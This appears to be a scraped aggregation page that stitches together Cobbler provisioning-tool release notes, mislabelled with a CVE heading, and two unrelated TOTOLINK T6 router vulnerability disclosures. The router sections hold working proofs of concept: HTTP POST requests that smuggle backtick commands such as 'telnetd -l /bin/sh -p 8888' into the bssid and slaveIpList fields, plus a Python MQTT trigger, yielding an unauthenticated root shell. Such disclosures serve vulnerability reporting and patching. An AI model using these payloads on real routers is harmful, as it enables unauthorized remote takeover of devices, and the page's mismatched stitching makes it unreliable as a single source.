*   `ipmitool` now is upstream supported by `fence_agents` via `ipmilanplus` #2542
*   `cobbler version` remove the `b` prefix #2543
*   We are now using `inst.ks` instead of `ks` #2534
*   Use the python-file bindings instead of a subprocess call #2482 #2480
*   Web Interface: Make new user management more obvious #2484

**Bugfixes**:

*   Remove redundant `.json` suffix: #2451 #2376 #2545 #2529
*   PAM Authentication failures are fixed now: #2400 #2444
*   Templating: Fix Cheetah macros #2570 #2509 #2403
*   Templating: Fix regex replacements #2513
*   Templating: Add `http_port` to all snippets we are aware of #2058
*   API: Have the legacy fields `kickstart` and `ks_meta` present at all times. #2311 #2568
*   Replicate: `revert_strip_none` prior adding an object on replicate #2548 #2505
*   Replicate: Fix paths during replication #2516
*   Web interface: Fix snippet path #2520
*   Web interface: Prevent duplicate pathing of snippets #2485
*   Fix script path from Cobbler #2479 #2478
*   Settings: Add missing rsync flags option #2467 #2468
*   Startup: Cobbler starts with sub-profiles now #2259 #2450
*   Web: Permissions for `/var/lib/cobbler/web.ss` #2439 #2452
*   Power management: Follow the `fence_agent` return codes #1491
*   `cobbler check`: Fix dnsmasq check #2155

**Other**:

*   CI: We changed to GitHub Actions from Travis #2514
*   CI: Add Test-PyPi release for every commit on `master` #2533 #2553 #2565
*   CI: Configure linters #2422 #2506
*   CI: Replace Fedora 31 with Fedora 33 for building packages #2463
*   Tests: Add more coverage #2554 #2550 #2546
*   Cleanup unused import #2551
*   Docs: Improvements at various places #2547 #2481 #2473 #1801 #2228
*   Removed unused multi-language support #2532
*   Un-categorized improvements #2524 #2464
*   Packaging: CentOS builds because of a virtual provides for a dependency #2340
*   Items: Streamline `template_types` type in all items #2262
*   Docker: Add `ldap` to the image per default #2335

**Breaking Changes**:

*   Possibly the settings file is not correctly migrated and needs to be manually adjusted.
*   Rename `settings` to `settings.yaml`
*   Add all keys which are missing. List will be available in `/var/log/cobbler/cobbler.log`.
*   We dropped support for CentOS 7 since no full Python 3 stack is available #2515

**Announcement**:

*   We will try to fade out Cheetah3 over time. Release 4.0.0 will contain only Jinja2 templates. We will aide and help with the transition and try to make it as smooth as possible
*   We will remove the internal implementation of the TFTP daemon with 3.3.0. If you use it, please use one from your system vendor in the future.

This release is a lot about bug fixes and smaller improvements.

**Important**: This will be the last release to contain the already deprecated Django Web Interface.

We have 2,960 additions and 1,018 deletions. We have merged 30 pull requests.

Milestone: V3.2.0

**New**:

*   Include Fedora32 & Ubuntu Focal in `signatures.json` (#2405)
*   Move rsync flags to the Cobbler settings `reposync_rsync_flags` (#1480 #2399)
*   Add a new Flag - `cache_enabled` - to enable or disable the cache (#2387)
*   When doing autoinstallations the conversion of hostnames to ips is now optional via this settings: `convert_server_to_ip` (#2357)

**Changes**:

*   Specfile got multiple improvements (#2413 #2409 #2334 #2351 #2355 #2392)
*   Documentation improvements (#2406 #2407 #2377 #2360 #2361 )
*   String replacments will now have a better performance (#2417)
*   Remove Python2 compability layer fully (#2402)
*   Rewrite the Spacewalk Auth Module (#2401)
*   Address tech-debt (#2380)
*   When building yourself you can configure the tftp directory (#2359)

**Bugfixes**:

*   Finally include ESXI7 Signatures (#2435 #2441)
*   Fix startup error when config variable is called before assignment. (#2394)
*   Remove dead code (#2367)
*   FileNotFoundError when under high load (#2362 #2365)
*   Sorting in the WebUI (#2265 #2390)
*   When copying a system, the invalid MAC error is now fixed (#2397)
*   Fix error message on the cli when using \`--verbose\`\` (#2388)
*   Fix some reposync related problems (#2384)
*   Fix repo and mgmtclass initializations (#2374 #2373)

**Other**:

*   Improved Tests (#2408 #2420)

**Breaking Changes**: We should have no breaking changes in this version.

This release syncs release30 with master. No patches for release30 were needed specifically.

We have +13,585 additions and −6,365 removals. We have merged 45 pull requests.

**New**:

*   For the distro there is now a parameter `remote_boot_initrd` and `remote_boot_kernel` ()
*   For the profile there is now a parameter `filename` for DHCP. (#2280)
*   Signatures for ESXi 6 and 7 (#2308)
*   The `hardlink` command is now detected more dynamically and thus more error resistant (#2297)
*   HTTPBoot will now work in some cases out of the bug. (#2295)
*   Additional DNS query for a case where the wrong record was queried in the `nsupdate system` case (#2285)

**Changes**:

*   Enabled a lot of tests, removed some and implemented new. (#2202)
*   Removed not used files from the codebase. (#2302)
*   Exchanged `mkisofs` to `xorrisofs`. (#2296)
*   Removed duplicate code. (#2224)
*   Removed unreachable code. (#2223)
*   Snippet creation and deletion now works again via xmlrpc. (#2244)
*   Replace `createrepo` with `createrepo_c`. (#2266)
*   Enable Kerberos through having a case sensitive `users.conf`. (#2272)

**Bugfixes**:

*   General various Bugfixes (#2331, )
*   `Makefile` usage and commands. (#2344, #2304)
*   Fix the dhcp template. (#2314)
*   Creation of the management classes and gPXE. (#2310)
*   Fix the `scm_track` module. (#2275, #2279)
*   Fix passing the `netdevice` parameter correctly to the `linuxrc`. (#2263)
*   `powerstatus` from cobbler now works thanks to a wrapper for `ipmitool`. (#2267)
*   In case the LDAP is used for auth, it now works with ADs. (#2274)
*   Fix passthru authentication. (#2271)

**Other**:

*   Add Codecov. (#2229)
*   Documentation updates. (#2333, #2326, #2305, #2249, #2268)
*   Buildprocess:
    *   Recreation and cleanup of Grub2. (#2278)
    *   Fix small errors for openSUSE Leap. (#2233)
    *   Fix `rpmlint` errors. (#2237)
    *   Maximum compatibility for debbuild package creation. (#2255, #2292, #2242, #2300)
*   Fixes related to our CI Pipeline (#2254, #2269)
*   Internal Code cleanup (#2273, #2270)

**Breaking Changes**:

*   Hash handling in users.digest file. (#2299)
*   When using a DEB or RPM we now replace the configs. So preserving the config needs to be ensured by you.

**Bugfixes**:

*   Incremented Version to 3.1.1 from 3.0.1

This release syncs release30 with master. No patches for release30 were needed specifically.

I would like to especially thank @Conan-Kudo for his work on the cross-distro specfile for cobbler and koan as well as @rbberger who was so kind to contribute a lot regarding building the rpms in docker for CentOS with the specfile this helped a lot!

We have a 8497 line diff for this release.

**New**:

*   We are now having a cross-distro specfile which can be build in the OBS (#2220) - before rewritten it was improved by #2144 & #2174
*   Grub Submenu for net-booting machines (#2217)
*   Building the Cent-OS RPMs in Docker (#2190 #2189)
*   Reintroduced manpage build in `setup.py` (#2185)
*   `mgmt_parameters` are now passed to the dhcp template (#2182)
*   Using the standard Pyhton3 logger instead of a custom one (#2160 #2139 #2151)
*   Script for converting the settings file from 3.0.0 to 3.0.1 (#2154)
*   Docs now inside the repo instead of cobbler.github.io and improved with sphinx (#2117)

**Changes**:

*   The default tftpboot directory is now `/var/lib/tftpboot` instead of previously `/srv/tftpboot` (#2220)
*   Distro signatures were adjusted where necessary (#2219 #2134)
*   Removed `requirements.txt` and placed the requirements in `setup.py` (#2204)
*   Display only entries in grub which are from the same arch (#2191 #2216)
*   Change the name of the cobbler manpage form `cobbler-cli` to `cobbler` back and move it to section 8 (#2188 #2186)

**Bugfixes**:

*   S390 Support was cleaned up (#2207 #2178)
*   PowerPC Support was cleaned up (#2178)
*   Added a missing import while importing a distro with `cobbler import` (#2201)
*   Fixed a case where a stacktrace would be produced so pass none instead (#2203)
*   Rename of `suse_kopts_textmode_overwrite` to `kops_overwrite` to `utils` (#2143 #2200)
*   Fix rsync subprocess call (#2199 #2179)
*   Fixed an error where the template rendering did not work (#2176)
*   Fixed some `cobbler import` errors (#2172)
*   Wrong shebang in various scripts (#2148)
*   Fix some imports which fixes errors introduced by the remodularization (#2150 #2153)

**Other**:

*   Issue Templates for Github (#2187)

**Breaking Changes**: None

This version comes with the following changes and new features:

**Fixes**:  
\- Fixes the use of disk drivers with koan (#1936)  
\- Fix rsync distro import (#1613)  
\- Fix built-in tftp server (#2018)  
\- Fix URL generation when https is enabled (#2063)  
\- Update the signatures (#2141 #2105)  
\- Update the sample.seed file with master (#2092)  
\- Only use the set-module only as a fallback (#2090)  
\- Fix IPMI usage (#2110)  
\- Some small Web-UI fixes (#2111 - contains also the version bump in the files where needed)  
\- Fix for the dhcp\_tag being undefined (#2095)

**New**:  
\- Use django 1.8+ (#2104)  
\- Add mgmt\_parameters to the dhcp template (#2180)  
\- Docs are now maintained inside this repo for readthedocs.io (#2197)

**Announcements**: The V3.x.x branch is now maintained in his own branch to allow development changes to go on top of master.

**Changes**:

*   We made cobbler now more modularized. So plugins can be grouped by directories and can be imported from sub-directories.
*   We dropped support for older Ubuntu versions.
*   We updated the `dhcpd.template` to bring an improved experience with dhcp templating.
*   We removed the custom logger and are now using the standard python3 logger with a config in `/etc/cobbler/logging_config.conf`
*   We fixed some shebangs to `/usr/bin/python3` to ease the pain for package maintainers
*   And more smaller fixes which should not affect your day to day usage but should improve your experience with cobbler.

**WARNING**: This release contains breaking changes for your settings file! A guide on how to convert your settings file can be found here cobbler.github.io

CVE-2021-45082: Releases · cobbler/cobbler

A command injection vulnerability in the function isAssocPriDevice of TOTOLINK Technology router T6 V3_Firmware T6_V3_V4.1.5cu.748_B20211015 allows attackers to execute arbitrary commands via a crafted MQTT packet.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:T6

Version:T6 V3\_Firmware(T6\_V3\_V4.1.5cu.748\_B20211015)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/190/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.**(MQTT, no authentication required)**

**Remote Command Execution**

In `setWiFiRepeaterCfg` function, `bssid` is directly passed by the attacker, so we can control the `bssid` to attack the OS.

First, make corresponding settings according to the selected network mode. This vulnerability occurs in the `isAssocPriDevice` function. We mainly explain the data flow of this part.

In `cstecgi.cgi` binary:

In `setWiFiRepeaterCfg` function, the input has not been checked.And then,call the function `apmib_set` to store this input.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_20/images/1.png)

In `wireless.so` binary:

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_20/images/2.png)

As you can see here, the input has not been checked.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_20/images/3.png)

In `libmystdlib.so` function

Eventually, the initial input cause command injection.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_20/images/4.png)

**Supplement**

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

Vulnerability trigger steps:

*   set `bssid` \=`telnetd`, in (`setWiFiRepeaterCfg`)
*   in (`freeStaClient`)

**PoC**

We set `bssid` as **`telnetd`** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 53
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/basic/wifi.html?time=1644749893933
Cookie: SESSION\_ID=2:1644749886:2

{"bssid":"\`telnetd\`","topicurl":"setWiFiRepeaterCfg"}

in (`freeStaClient`)

import paho.mqtt.client as mqtt
client \= mqtt.Client()
client.connect("192.168.1.1",1883,60)
client.publish('totolink/router/freeStaClient',payload\='{"hack":"hack"}')

**Result**

Get a shell!

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_20/images/5.png)

CVE-2022-25133: my_vuln/20.md at main · pjqwudi1/my_vuln

A command injection vulnerability in the function setUpgradeFW of TOTOLINK Technology router T6 V3_Firmware T6_V3_V4.1.5cu.748_B20211015 allows attackers to execute arbitrary commands via a crafted MQTT packet.

**TOTOLINK Vulnerability**

Vendor:TOTOLINK

Product:T6

Version:T6 V3\_Firmware(T6\_V3\_V4.1.5cu.748\_B20211015)(Download Link:https://www.totolink.net/home/menu/detail/menu\_listtpl/download/id/190/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:pengjiaqian@iie.ac.cn

**Vulnerability description**

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.

**Remote Command Execution**

In `cstecgi.cgi` binary:

In `setUpgradeFW` function,`slaveIpList` is directly passed by the attacker, so we can control the `slaveIpList` to attack the OS.

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_13/images/1.png)

**Supplement**

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

**PoC**

We set `slaveIpList` as **`telnetd -l /bin/sh -p 8888`** , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86\_64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 135
Origin: http://192.168.1.1
Connection: close
Referer: http://192.168.1.1/advance/upload.html?time=1644737080301
Cookie: SESSION\_ID=2:1644737054:2

{"slaveIpList":"\`telnetd -l /bin/sh -p 8888\`","resetFlags":"0","FileName":"hack.bin","ContentLength":4784128,"topicurl":"setUpgradeFW"}

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_13/images/2.png)

**Result**

Get a shell!

![](https://github.com/pjqwudi1/my_vuln/raw/main/totolink/vuln_13/images/3.png)

Tag

#ubuntu